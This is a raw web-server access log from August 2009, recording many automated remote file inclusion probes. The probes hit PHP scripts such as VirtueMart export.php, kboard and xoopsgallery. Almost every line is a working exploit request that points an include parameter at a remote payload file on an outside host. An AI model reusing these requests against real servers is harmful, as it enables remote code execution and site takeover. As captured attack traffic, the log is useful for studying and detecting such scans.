72.3.139.249 - - [16/Aug/2009:00:32:26 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:32:26 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:32:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:32:30 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:32:31 -0500] "GET /logs/access_log.1241049600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:32:31 -0500] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:32:44 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:32:44 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:32:44 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:32:44 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:32:59 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:32:59 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:32:59 -0500] "GET /logs/access_log.1241049600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:33:02 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:33:03 -0500] "GET /logs/access_log.1241049600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:33:03 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:33:07 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:33:07 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:33:07 -0500] "GET /logs/access_log.1241049600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.146.231.193 - - [16/Aug/2009:00:33:24 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.146.231.193 - - [16/Aug/2009:00:33:24 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.146.231.193 - - [16/Aug/2009:00:33:24 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:33:34 -0500] "GET /logs/access_log.1241049600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:33:42 -0500] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.254.156.235 - - [16/Aug/2009:00:34:39 -0500] "GET /logs/access_log.1237075200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.146.231.193 - - [16/Aug/2009:00:34:51 -0500] "GET /logs/access_log.1241481600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.254.156.235 - - [16/Aug/2009:00:35:09 -0500] "GET /logs/access_log.1237075200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
174.133.233.26 - - [16/Aug/2009:00:35:48 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.233.26 - - [16/Aug/2009:00:35:48 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.133.233.26 - - [16/Aug/2009:00:35:48 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
174.133.233.26 - - [16/Aug/2009:00:35:54 -0500] "GET /logs/access_log.1247097600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:36:16 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:36:16 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:36:17 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:36:17 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:36:29 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:36:29 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:37:02 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:37:03 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:37:55 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:37:55 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:37:55 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:38:44 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:38:44 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:38:44 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.186.1.54 - - [16/Aug/2009:00:40:12 -0500] "GET /logs/become_editor.php?theme_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 305 "-""libwww-perl/5.800"
89.186.1.54 - - [16/Aug/2009:00:40:15 -0500] "GET /become_editor.php?theme_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
72.3.139.249 - - [16/Aug/2009:00:40:50 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:40:50 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:41:01 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:41:02 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:41:08 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:00:41:09 -0500] "GET /logs/access_log.1240790400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:41:53 -0500] "GET /logs/access_log.1241222400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
65.55.106.131 - - [16/Aug/2009:00:42:47 -0500] "GET /logs/access_log.1243555200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.97.167.21 - - [16/Aug/2009:00:43:52 -0500] "GET /logs/access_log.1241222400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:44:44 -0500] "GET /logs/access_log.1241222400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:44:56 -0500] "GET /logs/access_log.1241222400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:46:05 -0500] "GET /logs/access_log.1241222400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
97.107.133.144 - - [16/Aug/2009:00:47:16 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
97.107.133.144 - - [16/Aug/2009:00:47:16 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.73.159.26 - - [16/Aug/2009:00:47:49 -0500] "GET /logs/access_log.1241222400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.246.20.221 - - [16/Aug/2009:00:49:02 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
218.246.20.221 - - [16/Aug/2009:00:49:02 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
78.90.113.17 - - [16/Aug/2009:00:51:45 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
78.90.113.17 - - [16/Aug/2009:00:51:45 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.186.1.54 - - [16/Aug/2009:00:51:47 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 340 "-""libwww-perl/5.800"
89.186.1.54 - - [16/Aug/2009:00:51:47 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 335 "-""libwww-perl/5.800"
78.90.113.17 - - [16/Aug/2009:00:52:14 -0500] "GET /logs/become_editor.php?theme_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
78.90.113.17 - - [16/Aug/2009:00:52:17 -0500] "GET /become_editor.php?theme_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.205.42.76 - - [16/Aug/2009:00:53:15 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
67.205.42.76 - - [16/Aug/2009:00:53:15 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
72.3.139.249 - - [16/Aug/2009:00:54:17 -0500] "GET /logs/access_log.1241222400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:57:27 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:57:27 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:57:27 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:57:28 -0500] "GET /logs/access_log.1247097600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.15.225.39 - - [16/Aug/2009:00:59:09 -0500] "GET /kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.edu-math.com/upload_question_images/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.15.225.39 - - [16/Aug/2009:00:59:09 -0500] "GET /logs/kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.edu-math.com/upload_question_images/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.15.225.39 - - [16/Aug/2009:00:59:09 -0500] "GET /logs/access_log.1228608000/kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.edu-math.com/upload_question_images/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.15.225.39 - - [16/Aug/2009:01:02:22 -0500] "GET /logs/access_log.1228608000%20%20/kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.edu-math.com/upload_question_images/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:01:03:00 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:01:03:00 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:01:03:00 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:01:03:01 -0500] "GET /logs/access_log.1247097600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.202.2.220 - - [16/Aug/2009:01:03:16 -0500] "GET /logs//appserv/adu.php?appserv_root=http://www.cpitz.com/m1.gif?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.202.2.220 - - [16/Aug/2009:01:03:16 -0500] "GET //appserv/adu.php?appserv_root=http://www.cpitz.com/m1.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.202.2.220 - - [16/Aug/2009:01:03:16 -0500] "GET /logs/access_log.1231200000//appserv/adu.php?appserv_root=http://www.cpitz.com/m1.gif?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.207.28 - - [16/Aug/2009:01:03:48 -0500] "GET /logs/access_log.1217376000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.146.231.193 - - [16/Aug/2009:01:04:58 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.146.231.193 - - [16/Aug/2009:01:04:58 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.146.231.193 - - [16/Aug/2009:01:04:59 -0500] "GET /logs/access_log.1247011200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.146.231.193 - - [16/Aug/2009:01:05:04 -0500] "GET /logs/access_log.1243814400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dokzoj.ru/fx29id2.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
216.213.87.98 - - [16/Aug/2009:01:05:06 -0500] "GET /logs/access_log.1239753600/?custompluginfile[]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.213.87.98 - - [16/Aug/2009:01:05:06 -0500] "GET /?custompluginfile[]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.213.87.98 - - [16/Aug/2009:01:05:13 -0500] "GET /logs/?custompluginfile[]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
67.205.42.76 - - [16/Aug/2009:01:05:17 -0500] "GET /logs/kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.205.42.76 - - [16/Aug/2009:01:05:17 -0500] "GET /logs/access_log.1228608000/kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.205.42.76 - - [16/Aug/2009:01:05:17 -0500] "GET /kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.213.87.98 - - [16/Aug/2009:01:05:26 -0500] "GET /?custompluginfile[]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.213.87.98 - - [16/Aug/2009:01:05:26 -0500] "GET /logs/access_log.1239753600/?custompluginfile[]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.213.87.98 - - [16/Aug/2009:01:05:27 -0500] "GET /logs/?custompluginfile[]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 201276 "-""Mozilla/5.0"
65.55.106.108 - - [16/Aug/2009:01:06:20 -0500] "GET /logs/access_log.1158451200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.86.61 - - [16/Aug/2009:01:08:46 -0500] "GET /logs//admin.wmtgallery.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.214.86.61 - - [16/Aug/2009:01:08:46 -0500] "GET //admin.wmtgallery.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.214.86.61 - - [16/Aug/2009:01:08:46 -0500] "GET /logs/access_log.1245283200//admin.wmtgallery.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.90.113.17 - - [16/Aug/2009:01:09:50 -0500] "GET /logs//?sourcedir=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 200 201281 "-""libwww-perl/5.805"
78.90.113.17 - - [16/Aug/2009:01:09:51 -0500] "GET //?sourcedir=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
77.240.118.133 - - [16/Aug/2009:01:10:03 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://www.visionaryentertainment.com/zencart/media/idn1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.240.118.133 - - [16/Aug/2009:01:10:03 -0500] "GET /?sourcedir=http://www.visionaryentertainment.com/zencart/media/idn1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.240.118.133 - - [16/Aug/2009:01:10:04 -0500] "GET /logs/?sourcedir=http://www.visionaryentertainment.com/zencart/media/idn1.txt?? HTTP/1.1" 200 201276 "-""Mozilla/5.0"
78.90.113.17 - - [16/Aug/2009:01:10:16 -0500] "GET /logs/kboard.php?board=news&act=access&no=&mode=delete//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
